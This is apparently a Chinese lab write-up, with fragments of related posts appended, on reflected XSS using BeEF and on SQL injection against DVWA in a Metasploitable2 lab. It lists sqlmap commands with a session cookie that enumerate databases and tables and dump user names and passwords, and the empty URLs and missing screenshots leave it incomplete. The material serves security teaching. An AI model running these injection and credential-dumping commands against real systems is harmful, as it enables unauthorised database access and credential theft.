XSS和SQL注入

2021-10-12 01:16:45 字數 2261 閱讀 2863

,>=,

單引號(「』」) 用於指示字串型資料 見select

逗號 分割相同的項 見select

2、 kali使用beef生成惡意**。

5、回答問題:實驗中xss攻擊屬於哪種型別?

反射型xss

實驗環境搭建。啟動metasploitable2虛擬機器。

1、注入點發現。首先肯定是要判斷是否有注入漏洞。

在輸入框輸入1,返回

id: 1

first name: admin

surname: admin

返回正常;

再次輸入1』,報錯,返回

輸入命令:

sqlmap -u "" --cookie "security=low; phpsessid=0b3a4d6d3f9dae831b11fc10e9b8dd46" --current-db --current-user
sqlmap輸出截圖。

3、列舉資料庫使用者名稱和密碼

輸入命令:

sqlmap -u "" --cookie "security=low; phpsessid=0b3a4d6d3f9dae831b11fc10e9b8dd46" -d dvwa -t users -c user,password  --columns --dump
sqlmap輸出截圖。

4、列舉資料庫

–dbs:列舉當前資料庫

輸入命令:

sqlmap -u "" --cookie "security=low; phpsessid=0b3a4d6d3f9dae831b11fc10e9b8dd46" -dbs
sqlmap輸出截圖。

5、列舉資料庫和指定資料庫的資料表

-d 資料庫名:指定資料庫

–tables:列舉指定資料庫的所有表

輸入命令:

sqlmap -u "" --cookie "security=low; phpsessid=0b3a4d6d3f9dae831b11fc10e9b8dd46" -d dvwa -tables
sqlmap輸出截圖。

6、獲取指定資料庫和表中所有列的資訊

-d:指定的資料庫

-t:指定資料庫中的資料表

–columns:獲取列的資訊

輸入命令:

sqlmap -u "" --cookie "security=low; phpsessid=0b3a4d6d3f9dae831b11fc10e9b8dd46" -d dvwa -t users --columns
sqlmap輸出截圖。

7、列舉指定資料表中的所有使用者名稱與密碼,並down到本地。

-c:列舉資料表中的列

–dump:儲存資料表項

輸入命令:

sqlmap -u "" --cookie "security=low; phpsessid=0b3a4d6d3f9dae831b11fc10e9b8dd46" -c -dump
sqlmap輸出截圖。

檢視down到本地的使用者名稱與密碼,截圖。(提示帶.的資料夾為隱藏,在圖形命令下,用檔案瀏覽器開啟資料夾,按下ctrl+h組合鍵可顯示隱藏檔案合資料夾,再按一次取消顯示。)

sql注入和xss攻擊

sql注入 就是通過把sql命令插入到web表單提交或輸入網域名稱或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的sql命令。具體來說,它是利用現有應用程式,將 惡意的 sql命令注入到後台資料庫引擎執行的能力,它可以通過在web表單中輸入 惡意 sql語句得到乙個存在安全漏洞的 上的資料庫,而不...

XSS與SQL注入

2 kali使用beef生成惡意 在這裡使用beef工具時出現了錯誤,不能使用預設的賬號和密碼,檔案中新增乙個賬號即可 二 sql注入實驗 實驗環境 實驗裝置 一台kali虛擬機器,一台metasploitable2虛擬機器 均採用橋接方式 在kali中訪問metasploitable2的dvwa,...

防止SQL注入和XSS注入的方法總結

1 在openresty中新增naxsi加強防禦安裝方法 2 防止sql注入的思路和方法1.永遠不要信任使用者的輸入。對使用者的輸入進行校驗,可以通過正規表示式,或限制長度 對單引號和 雙 進行轉換等。2.永遠不要使用動態拼裝sql,可以使用引數化的sql或者直接使用儲存過程進行資料查詢訪問。3.永...